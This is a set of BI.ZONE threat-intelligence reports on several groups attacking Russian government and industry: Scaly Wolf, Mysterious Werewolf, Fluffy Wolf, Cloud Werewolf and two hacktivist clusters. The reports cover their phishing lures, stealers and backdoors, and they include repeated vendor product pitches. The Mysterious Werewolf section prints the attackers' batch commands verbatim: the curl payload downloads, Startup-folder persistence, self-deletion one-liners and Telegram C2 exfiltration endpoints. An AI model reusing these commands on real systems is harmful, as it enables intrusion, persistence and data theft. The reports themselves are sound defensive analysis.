After rebooting, the files mail.exe and go.exe were executed.
Launching mail.exe led to the following actions:
Passwords from browsers on the compromised device were collected into a password.txt file. To do this, the software WebBrowserPassView was extracted from the archive pas.rar:
This was followed by checking the availability of the network resource www.msftncsi.com/ncsi.txt. If the check was successful, the obtained user credentials would be emailed to the attacker using the Blat utility:
Delete temporary files that may be in the folder C:\Intel\:
del /q /f C:\Intel\MPK.rar del /q /f C:\Intel\keys.rar del /q /f C:\Intel\curl.exe del /q /f C:\Intel\dc.exe del /q /f C:\Intel\dc.rar del /q /f C:\Intel\rezet.cmd del /q /f C:\Intel\open.lnk del /q /f C:\Intel\go.exe del /q /f C:\Intel\go1.exe del /q /f C:\Intel\mail.exe
Delete the registry key responsible for the autorun of go.exe:
The Mipko Employee Monitor software allows attackers to monitor user activity, intercept keystrokes and clipboard logs, record screen activity and device camera.
Conclusion
Cybercriminals continue to leverage dual-use software and legitimate tools to launch targeted attacks. This often allows them to blend into the compromised IT infrastructure and bypass multiple defenses. In addition, it is important to monitor the threat landscape of neighboring countries: attackers may change their targets over time, influenced by geopolitical events, among other things.
Phishing emails are a popular attack vector against organizations. To protect your mail server, you can use specialized services that help to filter unwanted emails. One such service is BI.ZONE CESP. The solution eliminates the problem of illegitimate emails by inspecting every message. It uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis. This inspection does not slow down the delivery of secure messages.
Legitimate tools are applied more and more often today to attack companies. Preventive defenses do not detect such methods — the intruders penetrate the infrastructure unnoticed. To discover such attacks, we recommend that companies implement detection, response, and prevention solutions, such as BI.ZONE TDR, as part of their security operations center.
What is common between two hacktivist groups attacking the Russian government sector.
The BI.ZONE Threat Intelligence team has expanded its taxonomy of threat actors. Previously, we distinguished state-sponsored groups as Werewolves and all the others as Wolves. Now, we have singled out yet another group to track hacktivist clusters as Hyenas.
In this article, we look into the similarities between two hacktivist clusters of activities: Gambling Hyena and Twelfth Hyena (previously, Twelfth Wolf).
Despite the limited data at our disposal, it is obvious that both clusters share common tactics, techniques, and procedures. This may suggest either an overlap in participants or the same organizer.
Comparison
Targeted industries
The two clusters of activity tend to attack organizations in the government sector.
Defense Evasion
Both groups abuse legitimate accounts to interact with compromised IT infrastructures, modify user application settings, and disable antivirus.
Moreover, both clusters apply wevtutil to clear event logs, for example:
This enables the attackers to hamper forensic efforts when their activity is discovered.
Credential Access
The ability to neutralize antivirus allowed the perpetrators to obtain additional authentication data. For this purpose, they employed widespread tools such as Mimikatz. The attackers did not even bother to modify or rename the tool. Although their methods were easy to detect, the absence of required monitoring tools in the victim organizations enabled the attackers to remain invisible up until they started acting destructively.
Lateral Movement
Another tool favored by the groups under research is PsExec (Sysinternals Suite). The tool allowed the adversaries to execute commands remotely. While PsExec is also popular among attackers (same as Mimikatz), we nonetheless consider the application of this tool as an additional matching factor.
Ransomware and wipers
Both clusters of activity leverage ransomware and wipers to inflict damage on the compromised infrastructures.
The perpetrators do not develop their own malware. Instead, they opt for a ransomware program based on the LockBit Black (3.0) builder, which became publicly available in September 2022.
X (Twitter) post with a link to LockBit Black (3.0)
The ransomware instance was configured to mimic the unique malicious program: from the ransom note to the desktop theme.
Ransomware desktop theme on a victim’s computer
As regards wipers, both clusters use Shamoon 4 to destroy data in compromised systems. The source code of the malware is available on GitHub.
Shamoon 4 repository on GitHub
It is worth mentioning that Gambling Hyena prefers the wiper version written in Golang.
Data leaks
Both clusters reveal the names of their victims in dedicated Telegram channels. For instance, Gambling Hyena publishes such information in a channel called Blackjack.
Blackjack publication about a new victim
Twelfth Hyena discloses such information in another Telegram channel, TWELVE.
TWELVE publication about a new victim
As seen in the above examples, both channels have posts in Russian and English with certain stylistic similarities.
Nevertheless, the channels provide new information about the victims, with six and eight affected organizations disclosed by Blackjack and TWELVE, respectively.
Conclusion
Although the BI.ZONE Threat Intelligence team views Twelfth Hyena and Gambling Hyena as independent clusters, the overlaps in their methods and tools suggest that the two may be closely interconnected. However, the limited amount of data at our disposal does not allow us to make a firm assumption.
MITRE ATT&CK
How threat intelligence can protect your company against such threats
To learn more about the current cyber threat landscape and the methods employed to attack IT infrastructures similar to yours, we recommend that you take advantage of the BI.ZONE Threat Intelligence platform. With insights on the attackers derived from the platform, you will be able to defend your business proactively. On top of that, the indicators of compromise updated on a daily basis will boost the effectiveness of your security tools.
The group, which has been on the radar since the summer of 2023, conducted several phishing campaigns using Russian regulatory body and law enforcement identities.
The BI.ZONE Threat Intelligence team has identified at least a dozen campaigns linked to Scaly Wolf. The impact spreads across organizations from various industries in Russia, including manufacturing and logistics.
One of the group’s characteristics in gaining initial access is their phishing emails designed to look like legitimate correspondence from Russian public authorities. Its phishing arsenal includes regulatory requirements and inquiries from Roskomnadzor (the Federal Service for Supervision of Communications, Information Technology and Mass Media), the Investigative Committee, and the Military Prosecutor’s Office, court orders, and other regulatory prescriptions. In rare cases, attackers disguise the letters as sales proposals. It should be noted that in all cases, the text from the email sounds official and well put together, which makes the mailing convincing, builds user trust, and encourages the user to launch a malicious attachment. The attack results in the system being infected with the White Snake stealer and the subsequent theft of corporate data. We wrote about this earlier.
Key findings
Stealers remain one of the most popular types of malware distributed by attackers. Many of them now have additional features, which allows stealers to be used effectively for targeted and sophisticated attacks.
The malware-as-a-service model enables the attackers to avoid wasting time on developing malware and just get the finished product. Similar to legitimate software, cracked versions of commercial malware often end up in the public domain.
Despite the bans by many developers to distribute their malware in Russia and other CIS countries, attackers find ways to modify and use it in these regions. This once again emphasizes the importance of monitoring underground networks in order to identify such threats before they are implemented against Russian organizations.
The malware
As mentioned earlier, White Snake is the weapon of choice for Scaly Wolf, which is certainly another distinctive characteristic of the group. The stealer first surfaced in February 2023 on the darknet as a tool for targeted attacks. White Snake is also distributed through a dedicated channel in Telegram.
The stealer can cost as little as $140 per month. In addition, adversaries do not even need experience in operating it. Therefore, an attack with this malware can be made as easy as renting it. This generates a high demand for the program. The ability to rent or purchase this class of malware significantly reduces the level of expertise required for attackers to execute targeted attacks.
White Snake can be run cross-platform using a downloader written in Python. On the Windows platform, the stealer implements the following features:
Remote access trojan
XML-based customization
Keylogger for stealing keystroke data
A successful attack can allow the adversary to gain access to multiple corporate resources, such as a mail server and a CRM. The malware can collect authentication data (passwords stored in browsers and other applications, cryptocurrency wallet data), copy files, record keystrokes, and remotely access the compromised device. Besides, the stealer uses the Serveo.net service for SSH access to the infected machine, enabling the criminal to execute commands on the compromised host, including the download of additional modules for post-exploitation tasks. Another feature of White Snake is to send notifications about newly infected devices to the Telegram bot.
With the appearance of White Snake on the black market, BI.ZONE Threat Intelligence began to monitor its activity online and its use against various organizations. Despite all the prohibitions to employ the stealer against the CIS countries, attacks on Russian organizations have been detected. The discovered activity clearly showed a similar set of tactics, techniques, and procedures (TTPs), which is why some of the attacks involving White Snake were attributed to the Scaly Wolf group. A distinctive approach for the group is to send phishing emails that are similar in design and pose as genuine government correspondence. Another typical characteristic is that the malware is almost always in a protected ZIP archive, with the password contained in the archive file name. For example, Требование CK от 08.08.23 ПАРОЛЬ — 123123123.zip (the password being 123123123).
Campaign timeline
June
Scaly Wolf first made itself known in June 2023, targeting Russian organizations under the guise of a Roskomnadzor requirement. Back then, the BI.ZONE Threat Intelligence team paid close attention to the White Snake activity and later began tracking the group behind it. As part of the campaign, the victim received a phishing email with an attached archive Требование Роскомнадзор № 02-12143(пароль-12121212).rar (a Roskomnadzor requirement) containing the following files:
Требование РОСКОМНАДЗОР № 02-12143.odt
Attachment to the Roskomnadzor requirement
РОСКОМНАДЗОР.png
The first file (fig. 1) is a phishing document that aims to lure the victim into opening the second file, which is the White Snake stealer.
Fig. 1. Text from the phishing document
July
We identified a new White Snake phishing email purportedly from the Investigative Committee of the Russian Federation. The subject line of the email (fig. 2) mentioned a criminal investigation related to a tax evasion (Investigative Committee inquiry in connection with a tax evasion investigation). Attached to it was a password-protected archive Запрос ГСУ СК РФ Уклонение от налогов № 7711 от 18.07.2023 пароль 12121313.zip (a tax evasion inquiry from the Investigative Committee). Inside were the following documents:
Права и обязанности и процедура ст. 164, 170, 183 УПК РФ.rtf (the rights, obligations, and procedure under the Criminal Procedure Code of the Russian Federation)
Перечень предприяти, уклонения от уплаты налогов, банковские счета, суммы уклонения, схема.exe (details about organizations suspected of tax evasion)
Like in the June campaign, the second file was masked as an attachment to a harmless document, although in fact it was the stealer.
Fig. 2. Text from the phishing email
August
The criminals continued to push the Investigative Committee ploy. On August 7, a new email was found to distribute White Snake under the pretense of sharing a requirement from the Investigative Committee (fig. 3). The following archives were attached to the mailing:
Требование CK от 08.08.23 ПАРОЛЬ — 123123123.zip
Требование CK от 07.08.23 ПАРОЛЬ — 12312312.zip
The archives also contained documents like Требование CK от 07.08.23 ПАРОЛЬ — 12312312\ГCУ CK PФ запрос.docx (an Investigative Committee inquiry) and an executable file Перечень юридических лиц и физических лиц в рамках уклонения, сумы уклонения.exe (legal entities and individuals suspected of evasion, sums of evasion).
Fig. 3. Text from a phishing document
September
On September 1, we detected a new wave of White Snake attacks. The adversaries decided to move away from scary topics related to Roskomnadzor or the Investigative Committee, at least temporarily. This time the letters were sent out under the guise of a sales proposal. A potential victim would receive a phishing email with a password-protected archive that could have the following names:
КП от 01.09.23 (Пароль к архиву — 121212).zip (a sales proposal with the archive password)
КП от 01.09.23 (пароль к архиву — 121212).rar (a sales proposal with the archive password)
КП 12119- тех.док.rar (a sales proposal)
In the September 6 mailing, the archive still contained a malicious executable disguised as a document attachment. However, on September 12, the file had the CMD extension:
The Scaly Wolf group decided to continue distributing emails with intimidating content. Starting from October 2, they went back to sending phishing emails on behalf of the Investigative Committee. The emails talked about a criminal investigation, among them, the following subject lines:
Investigation inquiry in connection with criminal case №11091007706001194, Russia’s Investigative Committee
Investigation inquiry in connection with criminal case №11091007706001194, the Investigative Committee of the Russian Federation
Investigation requirement under criminal case №11091007706011194, Russia’s Investigative Committee
Investigation inquiry under criminal case №11091007706011194, the Investigative Committee of the Russian Federation
The letter was accompanied by a PDF Запрос следователя (уклонение от уплаты налогов) — копия.pdf (an investigator's tax evasion inquiry) designed to divert the victim’s attention (fig. 4). It stated that the addressee should appear before the Investigative Committee for questioning as a witness in a forged documents case.
Like previously, the malicious executable file (fig. 5) was located together with the benign documents in the archive.
In addition to this file, there was an archive called Трeбoвaниe 19098 СК РФ от 07.09.23 ПАРОЛЬ — 123123123.zip (another requirement of the Investigative Committee) with the White Snake stealer under the following file names:
Перечень юридических лиц и физических лиц в рамках уклонения, сумы уклонения.exe (legal entities and individuals suspected of tax evasion, sums of evasion)
Перечень юридических лиц и предприятий, уклонение от уплаты налогов, требования и дополнительные материалы.exe (details about legal entities and enterprises suspected of tax evasion)
Fig. 4. Attachments to a phishing emailFig. 5. Phishing document
On October 16, a similar email was discovered also containing a PDF file and an archive (fig. 6).
Fig. 6. Phishing email with attachments
November
Throughout November, we continued to come across new malicious email campaigns with the White Snake stealer. For example, on November 2, the group started distributing emails informing potential victims about a court order. However, the attackers did not use an archive and immediately attached the executable file Постановление о производстве выемки и прилагаемые к запросу материалы.exe (an order of seizure and the materials relevant to the inquiry).
On November 13, the threat actors returned to their tested method of phishing and social engineering; namely, sending emails disguised as requirements from the Investigative Committee. Just as before, a victim received a password-protected archive named Трeбoвaниe 19225 СК РФ от 31.10.2023 ПАРОЛЬ — 11223344.zip (an Investigative Committee requirement) (fig. 7), which in turn contained more documents and the executable file Перечень юридических лиц и физических лиц в рамках уклонения, сумы уклонения.exe (legal entities and individuals suspected of evasion, sums of evasion).
Fig. 7. Attachments to phishing email
That same month, on November 20, we discovered a new email trying to conceal the White Snake stealer as regulatory documents. This time, the attackers asked to provide supplements for a contract attached to the email. In actual fact, the attachment contained an archive with an executable PE file inside (fig. 8).
Fig. 8. Text from the phishing email
January 2024
After a short break in December, the group returned in early 2024. While earlier the attackers pretended to be the Investigative Committee of the Russian Federation and Roskomnadzor, the new campaign was crafted around the Military Prosecutor’s Office of the Russian Federation. The subject lines in this campaign went as follows:
Seizure pursuant to the investigation of criminal case №111801400013001322, the Military Prosecutor’s Office of the Russian Federation
Requirement pursuant to the investigation of criminal case №111801400013001322 MPO RF
Seizure pursuant to the investigation of criminal case №111801400013001322 MPO RF
Figure 9 shows the email enclosed with an archive named Постановление о производстве выемки (ЄЦП) — пароль 1628.zip (an order of seizure), which contained the document Права и обязанности и процедура ст. 164, 170, 183 УПК РФ.rtf (the rights, obligations, and procedure under the Criminal Procedure Code of the Russian Federation), and the executable file Постановление о производстве выемки (электронная цифровая подпись).exe (an order of seizure).
Fig. 9. Attachments to the phishing email
Conclusions
We continue to witness a growing threat from various cybercriminal groups around the world, and this is no less true for the Russian region. Meanwhile, on the black market, the malware is becoming more affordable to lesser qualified adversaries, which only contributes to the flurry of threat actors and an increase in the number of targeted attacks. Scaly Wolf is one such group that our threat intelligence has been tracking for more than half a year.
Through their continuous dissemination of the White Snake stealer, the group is beginning to pose a serious threat to Russian business. Moreover, the fact that the attackers repeatedly send emails under the guise of public authorities, especially the Investigative Committee, indicates that their scheme is working and their campaigns are successful. Judging by the attacks already carried out in January 2024, Scaly Wolf will continue its attempts to compromise Russian companies and may remain out on the hunt for quite some time.
More information, including indicators, threat actor description, TTPs, and tools are available on BI.ZONE Threat Intelligence.
MITRE ATT&CK
How to protect your company from such threats
Phishing emails are a popular attack vector against organizations. To protect your mail server, you can use specialized services that help to filter unwanted emails. One such service is BI.ZONE CESP. The solution eliminates the problem of illegitimate emails by inspecting every message. It uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis. This inspection does not slow down the delivery of secure messages.
To better understand the current cyber threat landscape and realize exactly how infrastructures similar to yours are being attacked, we recommend leveraging the data from BI.ZONE Threat Intelligence. The solution provides information about current attacks, threat actors, their methods and tools. This data helps to ensure the effective operation of security solutions, accelerate incident response, and protect against the most critical threats to the company.
The criminal group gains initial access through phishing emails with a compressed executable that unleashes RingSpy, an original remote access backdoor.
The BI.ZONE Threat Intelligence team has detected a new campaign by Mysterious Werewolf, a cluster that has been active since at least 2023. This time, the adversaries are targeting defense enterprises. To achieve their goals, they use phishing emails with an archive attached. The archive contains a legitimate PDF document and a malicious CMD file. Once the document is extracted and double-clicked, the exploit launches the CMD file to deliver the RingSpy backdoor to the compromised system. This malware has replaced the Athena agent (Mythic C2 framework) utilized by Mysterious Werewolf in its previous attacks.
Key findings
Mysterious Werewolf continues to use phishing emails and CVE-2023–38831 in WinRAR to run malicious code in target systems.
The threat actors are experimenting with malicious payload. Now they have opted for RingSpy, a Python backdoor, to replace the Athena agent (Mythic C2 framework).
As before, the cluster abuses legitimate services to communicate with compromised systems. Thus, the criminals have turned a Telegram bot into their command-and-control server.
Attack description
The victim presumably receives an email with an archive that enables the criminals to exploit CVE-2023–38831. Opening the legitimate file in the archive launches a malicious script (e.g, O_predostavlenii_kopii_licenzii.pdf .cmd) that:
creates a.vbs file in the folder C:\Users\[user]\AppData\Local and writes a script to run the file whose name was passed as an argument
creates a 1.bat file in the folder C:\Users\[user]\AppData\Local and launches it with a command call "%localappdata%\.vbs" "%localappdata%\1.bat"
self-deletes after the launch: (goto) 2>nul & del "%~f0"
The running of 1.bat makes it possible to:
obtain the download link for the next stage of intrusion and save it in the r file in the folder C:\Users\[user]\AppData\Local: curl -o "C:\Users\[redacted]\AppData\Local\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=bat.bat" -H "Accept: application/json" -H "Authorization: OAuth [redacted]" -H "Content-Type: application/json"
download the file via the previously obtained link: set /p B=<"C:\Users\[redacted]\AppData\Local\r" curl -o "C:\Users\[redacted]\AppData\Local\i.bat" -L -O -X GET "%B:~9,445%" -H "Accept: application/json" -H "Authorization: OAuth [redacted]" -H "Content-Type: application/json"
delete the file with the download link: del /s /q "C:\Users\thesage\AppData\Local\r
run the downloaded file with the help of .vbs: call C:\Users\[redacted]\AppData\Local\.vbs C:\Users\[redacted]\AppData\Local\i.bat
self-delete after the launch: (goto) 2>nul & del "%~f0"
The running of the i.bat script makes it possible to:
prevent the repeat installation by checking the presence of the file C:\Users\[redacted]\AppData\Local\Microsoft\Windows\Caches\cversions.db; if missing, the file is created and its execution continues: if exist "%localappdata%\Microsoft\Windows\Caches\cversions.db" ( exit 0 ) echo. > "%localappdata%\Microsoft\Windows\Caches\cversions.db"
obtain the download address; download, open, and delete the decoy document (see the screenshot below) as well as delete the file with the download link: curl -s -o "%PDF_FOLDER%\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=file.pdf" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json" set /p B=<"%PDF_FOLDER%\r" curl -s -o "%PDF_FOLDER%\O predostavlenii licens.pdf" -L -O -X GET "%B:~9,443%" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json" start "" "%PDF_FOLDER%\O predostavlenii licens.pdf" del /s /q "%PDF_FOLDER%\r"
Decoy document
download the Python interpreter from the official website and unpack it to the folder C:\Users\[redacted]\AppData\Local\Python, and finally delete the archive: curl -s -o %localappdata%\python.zip -L -O "https://www.python.org/ftp/python/%PYTHON_VERSION_FIRST_TWO_PARTS%.4/python-%PYTHON_VERSION_FIRST_TWO_PARTS%.4-embed-amd64.zip" if exist "%FOLDER%" ( rmdir /s /q "%FOLDER%" mkdir "%FOLDER%" ) else ( mkdir "%FOLDER%" ) tar -xf %localappdata%\python.zip -C "%FOLDER%" del /s /q %localappdata%\python.zip. The variables used are: FOLDER=%localappdata%\Python PYTHON_VERSION_FIRST_TWO_PARTS=3.11 PYTHON_VERSION_FIRST_TWO_PARTS_WITHOUT_POINT=311
assign an attribute to the hidden folder C:\Users\[redacted]\AppData\Local\Python: attrib +h "%FOLDER%" /s /d
create the file C:\Users\[redacted]\AppData\Local\python311._pth with the following content: Lib/site-packages python.zip . # Uncomment to run site.main() automatically import site
obtain and launch the pip installer to download additional packets: (cd "%FOLDER%" && curl -s -o get-pip.py https://bootstrap.pypa.io/get-pip.py && python get-pip.py) call python -m pip install requests call python -m pip install schedule del /s /q get-pip.py
save the configuration for connecting RingSpy with a Telegram bot in the file C:\Users\[redacted]\AppData\Local\microsoft\windows\cloudstore\cloud
download RingSpy’s Python script via the Yandex Cloud API: curl -s -o "%FOLDER%\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=f" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json" set /p B=<"%FOLDER%\r" echo "%B:~9,426%" curl -s -o "%FOLDER%\f.py" -L -O -X GET "%B:~9,426%" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json" del /s /q "%FOLDER%\r" Where the .vbs file exists in the folder C:\Users\[user]\AppData\Local, it is deleted.
create the python.vbs file in the folder C:\Users\[redacted]\AppData\Local\Python with the following content: Set oShell = CreateObject("Wscript.Shell") oShell.Run “C:\Users\[redacted]\AppData\Local\Python\python.exe” "C:\Users\[redacted]\AppData\Local\Python\f.py” , 0, true
copy the created file to the startup folder: copy "%localappdata%\Python\python.vbs" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"
execute the created file: call "%localappdata%\Python\python.vbs"
run the downloaded backdoor file and self-delete, even if the.vbs file is missing: (goto) 2>nul & start /b python "%FOLDER%\f.py" -f "d" & del "%~f0"
The RingSpy backdoor enables an adversary to remotely execute commands, obtain their results, and download files from network resources. With the -f launch option enabled, RingSpy creates a scheduled task to run the python.vbs script every minute:
The backdoor’s C2 server is a Telegram bot. When the commands are successfully executed, their output is recorded into the file C:\Users\[redacted]\AppData\Local\Python\rs.txt to be sent as a file to the C2 server.
Downloading the file from the specified network location requires the following PowerShell command:
The files are sent to the C2 sever via https://api.telegram.org/bot[bot token]/sendDocument while the text is transferred through https://api.telegram.org/bot[bot token]/sendMessage.
More indicators of compromise and a detailed description of threat actor tactics, techniques, and procedures are available on the BI.ZONE Threat Intelligence platform.
Conclusions
The Mysterious Werewolf cluster continues to develop its attack methods. This time, the threat actors focus on the critical infrastructure of the defense industry. To communicate with the compromised systems, they resort to legitimate services more frequently than before. This once again proves the need for effective endpoint protection and round-the-clock monitoring, for example, as part of the BI.ZONE TDR service. Meanwhile, with real-time insights from the BI.ZONE Threat Intelligence platform, you can stay updated on the new methods employed at early attack stages and improve the effectiveness of your security solutions.
The group has adopted a simple yet effective approach to gain initial access: phishing emails with an executable attachment. This way, Fluffy Wolf establishes remote access, steals credentials, or exploits the compromised infrastructure for mining.
The BI.ZONE Threat Intelligence team has detected a previously unknown cluster, dubbed Fluffy Wolf, whose activity can be traced back to 2022. The group uses phishing emails with password-protected archive attachments. The archives contain executable files disguised as reconciliation reports. They are used to deliver various tools to a compromised system, such as Remote Utilities (legitimate software), Meta Stealer, WarZone RAT, or XMRig miner.
Key findings
Phishing emails remain an effective method of intrusion: at least 5% of corporate employees download and open hostile attachments.
Threat actors continue to experiment with legitimate remote access software to enhance their arsenal with new tools.
Malware-as-a-service programs and their cracked versions are expanding the threat landscape in Russia and other CIS countries. They also enable attackers with mediocre technical skills to advance attacks successfully.
The campaign
One of the latest campaigns began with the attackers sending out phishing emails, pretending to be a construction firm (fig. 1). The message titled Reports to sign had an archive with the password included in the file name.
Fig. 1. Phishing email
The archive contained a file Akt_Sverka_1C_Doc_28112023_PDF.com (a reconciliation report) that downloaded and installed Remote Utilities (a remote access tool) and launched Meta Stealer.
When executed, the malicious file performed the following actions:
replicated itself in the directory C:\Users\[user]\AppData\Roaming, for example, as Znruogca.exe(specified in the configuration)
created a Znruogca registry key with the value equal to the replicated file path, in the registry section HKCU\Software\Microsoft\Windows\CurrentVersion\Run to run the malware after system reboot
launched the Remote Utilities loader that delivers the payload from the C2 server
started a copy of the active process and injected Meta Stealer’s payload into it
The Remote Utilities installer is an NSIS (Nullsoft Scriptable Install System) that copies program modules to C:\ProgramData\TouchSupport\Bin and runs the Remote Utilities executable—wuapihost.exe.
Remote Utilities is a legitimate remote access tool that enables a threat actor to gain complete control over a compromised device. Thus, they can track the user’s actions, transmit files, run commands, interact with the task scheduler, etc. (fig. 2).
Fig. 2. Remote Utilities official website
Meta Stealer is a clone of the popular RedLine stealer which is frequently used in attacks against organizations in Russia and other CIS countries. Among others, this stealer was employed by the Sticky Wolf cluster.
The stealer can be purchased on underground forums and the official Telegram channel (fig. 3)
Fig. 3. Message in the Telegram channel
A monthly subscription for the malware may cost as little as 150 dollars while a lifetime license can be purchased for 1,000 dollars. It is noteworthy that Meta Stealer is not banned in the CIS countries.
The stealer allows the attackers to retrieve the following information about the system:
username
screen resolution
operating system version
operating system language
unique identifier (domain name + username + device serial number)
time zone
CPU (by sending a WMI request SELECT * FROM Win32_Processor)
graphics cards (by sending a WMI request SELECT * FROM Win32_VideoController)
browsers (by key enumeration in the register hives SOFTWARE\WOW6432Node\Clients\StartMenuInternet and SOFTWARE\Clients\StartMenuInternet)
software (by key enumeration in the register hives SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall)
security solutions (by sending WMI requests SELECT * FROM AntivirusProduct, SELECT * FROM AntiSpyWareProduct and SELECT * FROM FirewallProduct)
processes running (by sending a WMI request SELECT * FROM Win32_Process Where SessionId='[running process session]')
keyboard layouts
screenshots
Then it collects and sends the following information to the C2 server:
files that match the mask specified in the configuration
credentials and cookies from Chromium and Firefox-like browsers (browser paths are specified in the configuration)
FileZilla data
cryptocurrency wallet data (specified in the configuration)
data from the VPN clients installed on the compromised device (NordVPN, ProtonVPN)
We were also able to link this cluster to some previous campaigns that used different sets of tools:
a universal loader that spreads the payloads of the Remote Utilities installer and the Meta Stealer
an installer with the Meta Stealer payload that downloads Remote Utilities from the C2 server
the Remote Utilities installer only, without Meta Stealer
WarZone RAT, another malware-as-a-service solution, instead of Remote Utilities
a loader for Remote Utilities, Meta Stealer, and WarZone RAT in a single file
a miner as an additional tool
Conclusions
The duration and variety of attacks conducted by clusters of activity such as Fluffy Wolf prove their effectiveness. Despite the use of fairly simple tools, the threat actors are able to achieve complex goals. This once again highlights the importance of threat intelligence. Having access to the latest data, companies can promptly detect and eliminate malicious activity at the early stages of the attack cycle.
More indicators of compromise and a detailed description of threat actor tactics, techniques, and procedures are available on the BI.ZONE Threat Intelligence platform.
How to protect your company from such threats
Phishing emails are a popular attack vector against organizations. To protect your mail server, you can use specialized services that help to filter unwanted emails. One such service is BI.ZONE CESP. The solution eliminates the problem of illegitimate emails by inspecting every message. It uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis. This inspection does not slow down the delivery of secure messages.
To stay ahead of threat actors, you need to be aware of the methods used in attacks against different infrastructures and to understand the threat landscape. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence platform. The solution provides information about current attacks, threat actors, their methods and tools. This data helps to ensure the effective operation of security solutions, accelerate incident response, and protect against the most critical threats to the company.
Cloud Werewolf spearphishes for government employees in Russia and Belarus with fake spa vouchers and federal decrees
The attackers use phishing emails with seemingly legitimate documents and evade defenses by hosting the malicious payload on a remote server and limiting its downloads.
The BI.ZONE Threat Intelligence team has revealed another campaign by Cloud Werewolf aiming at Russian and Belarusian government organizations. According to the researchers, the group ran at least five attacks in February and March. The adversaries continue to rely on phishing emails with Microsoft Office attachments. Placing malicious content on a remote server and limiting the number of downloads enables the attackers to bypass defenses.
Key findings
Cloud Werewolf leverages topics that appeal to its targets to increase the likelihood that the malicious attachments get opened.
The IT infrastructure of government organizations provides ample opportunities for adversaries to exploit even the old vulnerabilities. This is just another reminder of how crucial it is to proactively remediate vulnerabilities, especially those used in real attacks.
Placing the malicious payload on a remote server rather than inside of an attachment increases the chances to bypass the defenses.
Campaign
Cloud Werewolf uses Microsoft Office documents with information targeting employees of government organizations. For instance, the file titled Путевки на лечение 2024.doc contains information on spa vouchers.
Excerpt from Путевки на лечение 2024.doc
Another document is a federal agency decree titled Приказ [redacted] № ВБ-52фс.doc.
Excerpt from Приказ [redacted] № ВБ-52фс.doc
Yet another document Инженерная записка.doc lists the requirements to an engineering memo for public works.
Excerpt from Инженерная записка.doc
Opening the attachment triggers the transfer of a document template from a remote source, such as https://triger-working[.]com/en/about-us/unshelling. The template is an RTF file that enables the attackers to exploit the CVE-2017-11882 vulnerability.
The successful exploitation and the execution of the shell code allow the adversaries to do the following:
decrypt the malicious payload within the shell code with the help of a 2-byte key XOR operation
download an HTA file with a VBScript from a remote server and open the file
The script triggers actions that:
reduce the size of the window and move it outside the screen boundaries
retrieve the path to the AppData\Roaming folder by means of obtaining the value of the APPDATA parameter of the HKCU\Volatile Environment registry key
create the rationalistic.xml file and write the following files to its alternate data streams: — rationalistic.xml:rationalistic.hxn, the file with malicious payload for connecting to the C2 server — rationalistic.xml:rationalistic.vbs, one of the files responsible for decrypting and executing the malicious payload — rationalistic.xml:rationalisticing.vbs, another file responsible for decrypting and executing the malicious payload — rationalistic.xml:rationalisticinit.vbs, the file responsible for purging all the files in the folder C:\Users\[user]\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\ and in rationalistic.xml:rationalisticinit.vbs and rationalistic.xml:rationalisticing.vbs by opening the files in write mode.
enable the autorun of rationalistic.xml:rationalistic.vbs by creating the defragsvc parameter with the value wscript /B “[path to the file rationalistic.xml:rationalistic.vbs]” in the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run
run rationalistic.xml:rationalisticing.vbs and rationalistic.xml:rationalisticinit.vbs with the help of the command wscript /B “[path to the file]”
By decrypting the malicious payload the adversaries can:
obtain an object of interaction with network resources by accessing the registry hive CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}\ProgID
use the proxy server whose address was retrieved from HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings
verify the presence of the defragsvc parameter in HKCU\Software\Microsoft\Windows\CurrentVersion\Run and create it if missing
stay connected to the server in an infinite loop
To obtain additional VBS files from the C2 server, the attackers send a GET request to the server’s address (e.g., https://web-telegrama[.]org/podcast/accademia-solferino/backtracker) with the header User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) [domain name] Chrome/116.0.0.0 Safari/537.36 Edg/116.0.0.0"=" Chrome/116.0.0.0 Safari/537.36 Edg/116.0.0.0. The device's domain is retrieved from the USERDOMAIN parameter of the HKCU\Volatile Environment registry key. Files under 1 MB are executed in the program memory, otherwise saved to the file rationalistic.xml:rationalisticinit.vbs and launched with the help of wscript /B “[path to the file rationalistic.xml:rationalisticinit.vbs]”. If executed from rationalistic.xml:rationalisticing.vbs, the name will be rationalistic.xml:rationalisticinginit.vbs. After execution, the file is purged by being opened in write mode.
If rationalistic.xml:rationalistic.tmp (or rationalistic.xml:rationalisticing.tmp, depending on the active file) is available, the specified file is sent to the C2 server through a POST request. After sending, the file is purged by being opened in write mode.
More about Cloud Werewolf
The cluster has been active since at least 2014 and also known as Inception and Cloud Atlas.
Cloud Werewolf is a state-sponsored threat actor focused on spying.
Attacks mostly government, industrial, and research organizations in Russia and Belarus.
At the post-exploitation stage, Cloud Werewolf can employ unique tools, such as PowerShower and VBShower, as well as Python scripts.
Uses LaZagne to receive authentication data.
Uses Advanced IP Scanner to gather information about remote systems.
Uses AnyDesk as a backup channel to access compromised IT infrastructures.
Uses RDP and SSH to advance in compromised IT infrastructures.
Uses 7-Zip to archive the files retrieved from the compromised systems.
Deletes C2 server communication entries (e.g., from proxy server logs).
More indicators of compromise and a detailed description of threat actor tactics, techniques, and procedures are available on the BI.ZONE Threat Intelligence platform.
How to protect your company from such threats
Cloud Werewolf’s methods of gaining persistence on endpoints are hard to detect with preventive security solutions. Therefore we recommend that companies enhance their cybersecurity with endpoint detection and response practices, for instance, with the help of BI.ZONE EDR.
